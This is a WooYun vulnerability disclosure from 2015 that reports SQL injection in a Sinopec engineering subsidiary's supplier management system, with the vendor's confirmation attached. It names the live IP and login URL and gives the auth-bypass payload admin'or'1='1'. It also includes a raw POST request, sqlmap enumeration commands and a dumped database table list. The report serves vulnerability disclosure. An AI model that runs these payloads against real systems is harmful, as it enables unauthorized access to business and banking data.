当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145640

漏洞标题:中国石化工程建设有限公司某信息系统存在基于时间SQL盲注

相关厂商:中国石油化工股份有限公司

漏洞作者: 帅克笛枫

提交时间:2015-10-10 18:27

修复时间:2015-11-26 11:22

公开时间:2015-11-26 11:22

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-10: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

~我要一步一步往上爬
等待阳光静静看着它的脸
小小的天有大大的梦想
我有属于我的天
任风吹干流过的泪和汗
总有一天我有属于我的天~

详细说明:

访问:http://220.194.29.181/seigys/logonAction.do,如图所示:

sei1.png

中国石化工程建设有限公司SEI供应管理系统,万能的弱口令,admin'or'1='1',密码任意,如图所示:

sei2.png

登录进去,企业开户行,资质证书地址及联系人信息,如图所示:

sei3.png

存在POST注入,如下所示:

POST /seigys/logonAction.do HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/vnd.ms-powerpoint, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://220.194.29.181/seigys/logonAction.do
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 220.194.29.181
Content-Length: 33
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=LzFyWRJZpcQxcyd5YVsDvnj6rBXVSJR48GKXNz7Hbwngv6tKWxmZ!-716689337!1152250566
userid=admin&password=admin&act=2

漏洞证明:

sqlmap检测如图所示:

sei4.png

[root@Hacker~]# Sqlmap -r hsz1.txt --dbs,19个库,如图所示:

sei5.png

[root@Hacker~]# Sqlmap -r hsz1.txt -D SEIIaMS --tables,如图所示:

sei6.png

[root@Hacker~]# Sqlmap -r hsz1.txt -D SYSTEMA --tables,如下所示:
Database: SYSTEMA
[69 tables]
+----------------------------+
| Booked_On |
| Course |
| CustomNav |
| Customers |
| DEPARTMENT |
| DEPENDENT |
| Joueur |
| Linkdesc_table |
| Mitgliederliste |
| Province |
| QRTZ_JOB_LISTENERS |
| Sea |
| admin_id |
| administrators |
| adminuser |
| agent_specialty |
| alias |
| binn_forum_themes_temps |
| binn_site_users_rights |
| changePrix |
| channelitems |
| defertest |
| distance |
| dtb_recommend_products |
| e107_user |
| f_attributedefinition |
| funny_jokes |
| gruppe |
| guava_roles |
| guava_users |
| help_relation |
| hitcounter |
| imagelinks |
| islandIn |
| jforum_users |
| jiveUserProp |
| kategorien |
| lost_pass |
| maxcodtelefono |
| movie |
| mtb_pref |
| music_association |
| name |
| news_lostpass |
| newsletter |
| not_null_with_default_test |
| nuke_main |
| nuke_related |
| phpbb_topics |
| phpshop_news |
| poll_user |
| provincias |
| queue_info |
| reguser |
| sitelogins |
| sons |
| specialty |
| spip_caches |
| spip_ortho_cache |
| stars_in_movies |
| subscribe |
| supplier |
| tblblogentries |
| test_user |
| tf_settings |
| vcd_MovieCategories |
| vcd_Users |
| yabb_settings |
| zl_admin |
+----------------------------+
各种user,速度实在慢,跑不动~~

修复方案:

~修复~

版权声明:转载请注明来源 帅克笛枫@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-10-12 11:20

厂商回复:

谢谢!我们将尽快处理。

最新状态:

暂无